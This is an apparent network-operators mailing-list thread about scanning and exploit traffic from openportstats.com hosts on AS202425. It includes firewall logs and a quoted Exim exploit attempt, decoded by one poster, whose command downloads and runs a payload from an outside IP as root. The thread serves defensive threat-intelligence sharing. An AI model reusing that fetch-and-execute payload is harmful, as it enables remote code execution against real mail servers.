Russian Anal Probing + Malware

Ronald_F_Guilmette1 · June 22, 2019, 12:13am

https://twitter.com/GreyNoiseIO/status/1129017971135995904
https://twitter.com/JayTHL/status/1128718224965685248

Friday Questionaire:

Is there anybody on this list who keeps firewall logs and who
DOESN'T have numerous hits recorded therein from one or more
of the following IP addresses?

NOTE: Dshield has already assigned an 8 rating on their Badness Richter
Scale to the specific one of the above addresses that's been poking me
personally in recent days:

https://www.dshield.org/ipinfo.html?ip=89.248.162.168
https://www.dshield.org/ipdetails.html?ip=89.248.162.168

And the Dshield rating is *just* based on the probing. The addition of
malware slinging also puts this whole mess over the top entirely.

Oh! And I'll save you all the time looking it up.... 100% of the IPs
listed above are on AS202425 "IP Volume, Inc. allegedly of the Seychelles
Islands, where the employees and management are no doubt enjoying their
luxurious and expansive new corporate headquarters...

https://bit.ly/2ZBayc4

Regards,
rfg

P.S. This is the kind of thing that everybody really should expect
when the U.S. Department of Defense takes it upon itself to start up
its own little private and unauthorized (cyber)war on Russia, wthout
first obtaining the consent of Congress... you know, kinda like that
ancient yellowed document that nobody in this country reads anymore
says they should. And apparently, the DoD was understandably not
anxious to brief even the President about all this...

https://www.businessinsider.com/us-officials-hide-russia-cyber-operation-trump-2019-6

(Not that anybody can really blame them for THAT.)

Keith_Medcalf · June 22, 2019, 5:01pm

https://twitter.com/GreyNoiseIO/status/1129017971135995904
https://twitter.com/JayTHL/status/1128718224965685248

Sorry, don't twitter ... Too much malicious JavaScript there.

Friday Questionaire:

Is there anybody on this list who keeps firewall logs and who
DOESN'T have numerous hits recorded therein from one or more
of the following IP addresses?

80.82.64.21 scanner29.openportstats.com
80.82.70.2 scanner8.openportstats.com
80.82.70.198 scanner21.openportstats.com
80.82.70.216 scanner13.openportstats.com
80.82.78.104 scanner151.openportstats.com
89.248.160.132 scanner15.openportstats.com
89.248.162.168 scanner5.openportstats.com
89.248.168.62 scanner1.openportstats.com
89.248.168.63 scanner2.openportstats.com
89.248.168.73 scanner3.openportstats.com
89.248.168.74 scanner4.openportstats.com
89.248.168.170 scanner17.openportstats.com
89.248.168.196 scanner16.openportstats.com
89.248.171.38 scanner7.openportstats.com
89.248.171.57 scanner20.openportstats.com
89.248.172.18 scanner25.openportstats.com
89.248.172.23 scanner27.openportstats.com
93.174.91.31 scanner10.openportstats.com
93.174.91.34 scanner11.openportstats.com
93.174.91.35 scanner12.openportstats.com
93.174.93.98 scanner18.openportstats.com
93.174.93.149 scanner6.openportstats.com
93.174.93.241 scanner14.openportstats.com
93.174.95.37 scanner19.openportstats.com
93.174.95.42 scanner8.openportstats.com
94.102.51.31 scanner31.openportstats.com
94.102.51.98 scanner55.openportstats.com
94.102.52.245 scanner9.openportstats.com

I have just a few. They have all been blocked. There have been no incoming sessions established, nor any outbound sessions to these addresses.

Why do you think it is a problem and not just run-of-the-mill background radiation on the Internet?

Do you (or your endpoints) not have a firewall to block such things?

select * from hosts where name like '%openports%';

id address name ---------- ------------- ---------------------------- 3662 93.174.93.241 scanner14.openportstats.com. 5061 93.174.95.42 scanner8.openportstats.com. 11894 93.174.93.149 scanner6.openportstats.com. 17720 93.174.93.98 scanner18.openportstats.com. 54208 80.82.70.2 scanner8.openportstats.com. 54790 89.248.160.13 scanner15.openportstats.com. 55081 89.248.168.19 scanner16.openportstats.com. 55629 89.248.168.17 scanner17.openportstats.com. 59858 89.248.171.57 scanner20.openportstats.com. 64626 89.248.171.38 scanner7.openportstats.com. 70081 93.174.95.37 scanner19.openportstats.com. 72978 80.82.70.216 scanner13.openportstats.com. 74711 94.102.52.245 scanner9.openportstats.com. 80358 89.248.162.16 scanner5.openportstats.com. 86148 89.248.172.18 scanner25.openportstats.com. 89484 94.102.51.31 scanner31.openportstats.com. 90131 80.82.70.198 scanner21.openportstats.com. 90531 80.82.78.104 scanner151.openportstats.com 91641 80.82.64.21 scanner29.openportstats.com. 104810 94.102.51.98 scanner55.openportstats.com. description asn lastupdate
----------- ---------- ----------
202425 1561209704
202425 1560718494
202425 1560732443
202425 1560640554
202425 1560774033
202425 1560682732
202425 1561158220
202425 1560817976
202425 1560800216
202425 1560841829
202425 1560802023
202425 1560709312
202425 1560589038
202425 1561217966
202425 1560884061
202425 1561199715
202425 1560776777
202425 1561150052
202425 1561184548
202425 1561138118

select * from asns where asn=202425;

asn country rir allocated description lastupdate
---------- ---------- ---------- ---------- --------------- ----------
202425 SC ripencc 2018-05-17 INT-NETWORK, SC 1561217966

select srcaddress, count(*), min(localtime), max(localtime) from firewalllog where srcaddress in (select address from hosts where name like '%openportstats.com.') group by srcaddress;

srcaddress count(*) min(localtime) max(localtime)
----------- ---------- ------------------------------ ------------------------------
80.82.64.21 6 2019-03-28 05:21:13.919 -06:00 2019-03-31 06:47:28.309 -06:00
80.82.70.2 208 2019-01-23 12:58:02.557 -07:00 2019-04-02 06:37:43.125 -06:00
80.82.70.19 114 2019-03-25 14:13:17.058 -06:00 2019-04-02 06:39:57.214 -06:00
80.82.70.21 17970 2019-02-25 13:34:52.202 -07:00 2019-04-24 19:27:58.113 -06:00
80.82.78.10 767 2019-03-26 08:37:53.799 -06:00 2019-06-21 15:27:05.791 -06:00
89.248.160. 1754 2019-01-24 12:40:58.764 -07:00 2019-04-13 05:02:00.866 -06:00
89.248.162. 1384 2019-03-09 16:21:40.538 -07:00 2019-06-22 09:39:26.809 -06:00
89.248.168. 43 2019-01-25 18:52:41.512 -07:00 2019-03-28 06:57:15.269 -06:00
89.248.168. 1543 2019-01-24 23:03:14.052 -07:00 2019-04-23 01:46:26.558 -06:00
89.248.171. 22 2019-02-10 12:14:00.168 -07:00 2019-02-12 14:16:40.212 -07:00
89.248.171. 1850 2019-02-01 18:06:15.893 -07:00 2019-06-17 13:36:56.062 -06:00
89.248.172. 3 2019-03-18 20:33:50.209 -06:00 2019-03-23 16:47:31.949 -06:00
93.174.93.9 67 2018-12-08 17:42:28.122 -07:00 2019-04-01 03:24:06.896 -06:00
93.174.93.1 16 2018-12-04 03:34:47.534 -07:00 2019-05-07 01:34:27.308 -06:00
93.174.93.2 1661 2018-11-23 10:13:06.957 -07:00 2019-06-22 07:21:44.239 -06:00
93.174.95.3 144 2019-02-20 08:06:52.282 -07:00 2019-02-28 02:30:39.109 -07:00
93.174.95.4 252 2018-11-24 22:14:19.061 -07:00 2019-03-03 19:04:48.709 -07:00
94.102.51.3 262 2019-03-24 10:03:55.679 -06:00 2019-06-22 04:35:15.886 -06:00
94.102.51.9 32 2019-04-28 08:52:43.818 -06:00 2019-05-17 11:22:16.166 -06:00
94.102.52.2 38 2019-02-28 12:45:52.949 -07:00 2019-03-07 07:30:03.547 -07:00

NOTE: Dshield has already assigned an 8 rating on their Badness
Richter Scale to the specific one of the above addresses that's
been poking me personally in recent days:

https://www.dshield.org/ipinfo.html?ip=89.248.162.168
https://www.dshield.org/ipdetails.html?ip=89.248.162.168

And the Dshield rating is *just* based on the probing. The addition
of malware slinging also puts this whole mess over the top entirely.

What malware slinging? I see none of that. Merely unsolicited incoming connection attempts. I note that neither the ASN in question nor the addresses are on the DROP list.

Oh! And I'll save you all the time looking it up.... 100% of the IPs
listed above are on AS202425 "IP Volume, Inc. allegedly of the
Seychelles Islands, where the employees and management are no
doubt enjoying their luxurious and expansive new corporate headquarters...

Good for them. Everyone should have luxurious and expansive corporate headquarters.

https://bit.ly/2ZBayc4

Malicious link detected.

Troy_Mursch · June 22, 2019, 8:58pm

AS202425 = AS29073. Formerly known as Quasi Networks / Ecatel. See previous NANOG thread here: https://mailman.nanog.org/pipermail/nanog/2017-August/091956.html

FHR · June 22, 2019, 10:04pm

     https://twitter.com/GreyNoiseIO/status/1129017971135995904
     https://twitter.com/JayTHL/status/1128718224965685248

Friday Questionaire:

Is there anybody on this list who keeps firewall logs and who
DOESN'T have numerous hits recorded therein from one or more
of the following IP addresses?

80.82.64.21 scanner29.openportstats.com
80.82.70.2 scanner8.openportstats.com
80.82.70.198 scanner21.openportstats.com
80.82.70.216 scanner13.openportstats.com
80.82.78.104 scanner151.openportstats.com
89.248.160.132 scanner15.openportstats.com
89.248.162.168 scanner5.openportstats.com
89.248.168.62 scanner1.openportstats.com
89.248.168.63 scanner2.openportstats.com
89.248.168.73 scanner3.openportstats.com
89.248.168.74 scanner4.openportstats.com
89.248.168.170 scanner17.openportstats.com
89.248.168.196 scanner16.openportstats.com
89.248.171.38 scanner7.openportstats.com
89.248.171.57 scanner20.openportstats.com
89.248.172.18 scanner25.openportstats.com
89.248.172.23 scanner27.openportstats.com
93.174.91.31 scanner10.openportstats.com
93.174.91.34 scanner11.openportstats.com
93.174.91.35 scanner12.openportstats.com
93.174.93.98 scanner18.openportstats.com
93.174.93.149 scanner6.openportstats.com
93.174.93.241 scanner14.openportstats.com
93.174.95.37 scanner19.openportstats.com
93.174.95.42 scanner8.openportstats.com
94.102.51.31 scanner31.openportstats.com
94.102.51.98 scanner55.openportstats.com
94.102.52.245 scanner9.openportstats.com

NOTE: Dshield has already assigned an 8 rating on their Badness Richter
Scale to the specific one of the above addresses that's been poking me
personally in recent days:

     IP Info: 89.248.162.168 - SANS Internet Storm Center
     https://www.dshield.org/ipdetails.html?ip=89.248.162.168

And the Dshield rating is *just* based on the probing. The addition of
malware slinging also puts this whole mess over the top entirely.

Oh! And I'll save you all the time looking it up.... 100% of the IPs
listed above are on AS202425 "IP Volume, Inc. allegedly of the Seychelles
Islands, where the employees and management are no doubt enjoying their
luxurious and expansive new corporate headquarters...

It's just a port/vulnerability scanner, I really don't see anything special about this particular case.

"IP Volume" is actually a new brand of Ecatel/Quasi Networks, servers are in a Dutch datacenter.

P.S. This is the kind of thing that everybody really should expect
when the U.S. Department of Defense takes it upon itself to start up
its own little private and unauthorized (cyber)war on Russia, wthout
first obtaining the consent of Congress... you know, kinda like that
ancient yellowed document that nobody in this country reads anymore
says they should. And apparently, the DoD was understandably not
anxious to brief even the President about all this...

US Officials Hiding Details of Russia Cyber Operation From Trump: NYT

(Not that anybody can really blame them for THAT.)

What does that have to do with the vulnerability scanner? Also: You know it doesn't make any sense, right?

Andy_Smith · June 23, 2019, 4:04am

Hello,

What malware slinging?

Some user there is trying to exploit CVE-2018-10149:

2019-06-11 11:28:35 SMTP protocol synchronization error (next input sent too soon: pipelining was not advertised): rejected "RCPT TO:<bin+${run{\x2fbin\x2fsh\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2eyyearz\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyyearz\x20\x2dn\x20\x26\x22}}@myhostname>" H=(myhostname) [89.248.171.57] next input="QUIT\n"

Plus another 17 attempts by that IP through to 19 June.

$ printf "\x2fbin\x2fsh\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2eyyearz\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyyearz\x20\x2dn\x20\x26\x22\n"
/bin/sh -c "wget --no-check-certificate -T 36 hxxps://185.162.235.211/ldm1ip -O /root/.yyearz && sh /root/.yyearz -n &"

(I replaced https with hxxps to prevent auto-link-followers from
hitting the site.)

Cheers,
Andy

Ronald_F_Guilmette1 · June 23, 2019, 5:51am

In message <f2682032aa620f49aa50b30579a9357f@mail.dessus.com>,

https://twitter.com/GreyNoiseIO/status/1129017971135995904
https://twitter.com/JayTHL/status/1128718224965685248

Sorry, don't twitter ... Too much malicious JavaScript there.

Can you be more, um, specific?

80.82.64.21 scanner29.openportstats.com
...

Why do you think it is a problem and not just run-of-the-mill background
radiation on the Internet?

It's not a problem for me personally... other than the fact that these
goofballs are filling up my log files to no good end. I just wanted
others to be aware of this (apparently ongoing) garbage.

And I wouldn't want anyone to be fooled by the mere fact that this
openportstats.com domain has a sort-of a web site. It's still 100%
illegitimate.

Do you (or your endpoints) not have a firewall to block such things?

I do, and I hope everyone else does also.

What malware slinging? I see none of that.

You didn't look at the Twitter reports.

https://bit.ly/2ZBayc4

Malicious link detected.

If you say so. (It's actually just a cute picture.)

Regards,
rfg

Rich_Kulawiec · June 23, 2019, 5:14pm

Well, I *did*, but having noticed their activities and grown tired of
them, I now just drop their traffic on the floor (and log it).

They are one of several operations that I've noticed who have taken it
upon themselves to poke at open (and closed) ports without bothering
to ask. Assuming for a moment the most charitable interpretation of
their collective actions -- that they are earnest researching problems
with the intention of helping to solve them -- this is still highly
problematic for two reasons:

1. They didn't ask permission.

2. Whether they realize it or not, they're building a target. When,
not if, their results database(s) are compromised, they will have
furnished the attackers with a comprehensive target list, painstakingly
gathered at no cost to them and thoughtfully annotated with whatever
metadata has been collected.

---rsk

Dan_Hollis · June 23, 2019, 8:37pm

they are pushing exploits. trying to RCE, wget a binary, chmod 777 on routers and rm -rf files.

this goes way beyond scanner and into criminal trespass and destruction of property.

https://twitter.com/JayTHL/status/1128700101675954176

remain ignorant if you want.

-Dan

Bandy_Rush1 · June 23, 2019, 9:23pm

It's just a port/vulnerability scanner, I really don't see anything
special about this particular case.

they are pushing exploits. trying to RCE, wget a binary, chmod 777 on
routers and rm -rf files.

this goes way beyond scanner and into criminal trespass and
destruction of property.

https://twitter.com/JayTHL/status/1128700101675954176

having trouble following the attribution. yes, of course there are folk
trying to exploit. but missing the link that *these* folk are.

e.g. i am aware of researchers scanning to see patching spread and
trying to make a conext paper dreadline this week or infocom next month.

hard to tell the sheep from the goats and the wolf from the sheep. i
get the appended. sheep or wholf? i sure do not claim to be smart
enough to know. but i sure am glad others are </snark>.

randy

Brad2 · June 23, 2019, 9:43pm

See inline responses...

‐‐‐‐‐‐‐ Original Message ‐‐‐‐‐‐‐

https://twitter.com/GreyNoiseIO/status/1129017971135995904
https://twitter.com/JayTHL/status/1128718224965685248

After forwarding these links to a sanitized client on another network, I saw nothing on the "twitter reports" which suggest these subnets are doing anything other than port scanning.

For those who refuse to follow Twitter links (I'm with ya):
There is one cropped screen shot of a pcap with some incomplete information for a entirely different subnet and zero useful intel.

Am I missing something, or do you have any actual log files to support your claims of malware slinging from these guys? ....and I do not want "popularity contest" results of the twitter-verse - to protect our networks. Real data is needed. We need to know what we are looking for specifically.

As for the network probing - this is why those activities are blocked and other techniques are implemented to obscure the usefulness of the data they collect. The way I see it... If people go poking their hands in the honey jars without permission, they may just get something they do not want or expect (I hear non-consensual probing can infect the violator with certain diseases, and that would be a shame)

Friday Questionaire:

Is there anybody on this list who keeps firewall logs and who
DOESN'T have numerous hits recorded therein from one or more
of the following IP addresses?

[snip]

NOTE: Dshield has already assigned an 8 rating on their Badness Richter
Scale to the specific one of the above addresses that's been poking me
personally in recent days:

IP Info: 89.248.162.168 - SANS Internet Storm Center
https://www.dshield.org/ipdetails.html?ip=89.248.162.168

And the Dshield rating is just based on the probing. The addition of
malware slinging also puts this whole mess over the top entirely.

What malware?

Oh! And I'll save you all the time looking it up.... 100% of the IPs
listed above are on AS202425 "IP Volume, Inc. allegedly of the Seychelles
Islands, where the employees and management are no doubt enjoying their
luxurious and expansive new corporate headquarters...

Sounds like a good deal.

https://bit.ly/2ZBayc4

I do not follow external links generally, as a rule, without compelling need and additional measures taken.

Regards,
rfg

P.S. This is the kind of thing that everybody really should expect
when the U.S. Department of Defense takes it upon itself to start up
its own little private and unauthorized (cyber)war on Russia, wthout
first obtaining the consent of Congress... you know, kinda like that
ancient yellowed document that nobody in this country reads anymore
says they should. And apparently, the DoD was understandably not
anxious to brief even the President about all this...

US Officials Hiding Details of Russia Cyber Operation From Trump: NYT

(Not that anybody can really blame them for THAT.)

P.S - Lets try to keep politics off the list. We get enough of that everywhere else.

Thanks,
Brad

Dan_Hollis · June 23, 2019, 9:46pm

https://pbs.twimg.com/media/D6oBGYPUwAECG09.png

you're trying to defend them?

-Dan

Andy_Smith · June 23, 2019, 10:03pm

Hi Brad,

> https://twitter.com/GreyNoiseIO/status/1129017971135995904
> https://twitter.com/JayTHL/status/1128718224965685248

After forwarding these links to a sanitized client on another network, I saw nothing on the "twitter reports" which suggest these subnets are doing anything other than port scanning.

Earlier I posted one example of an attempt to exploit CVE-2019-10149 to
execute commands as root on one of my machines. I have 17 other
examples from the same IP that try to do similar things via the same
exploit, though there are differences which suggest to me that multiple users or groups
are using openportstats for this purpose.

Would you like to see them?

I think that trying to actively exploit a bug to execute arbitrary commands is
a lot different to mere port scanning. They aren't all harmless commands
either; some of them install rootkits and remote shells.

Cheers,
Andy

Hank_Nussbacher1 · June 24, 2019, 4:24am

e.g. i am aware of researchers scanning to see patching spread and
trying to make a conext paper dreadline this week or infocom next month.

hard to tell the sheep from the goats and the wolf from the sheep. i
get the appended. sheep or wholf? i sure do not claim to be smart
enough to know. but i sure am glad others are </snark>.

Greynoise can be your friend:
https://greynoise.io/about
https://viz.greynoise.io/table

-Hank

Tom_Beecher · June 24, 2019, 4:38pm

I chuckle the most at the original twitter post from Greynoise :

“We have revoked the benign tag for OpenPortStats[.]com”

Did anyone actually think such a thing would be legitimate to start with?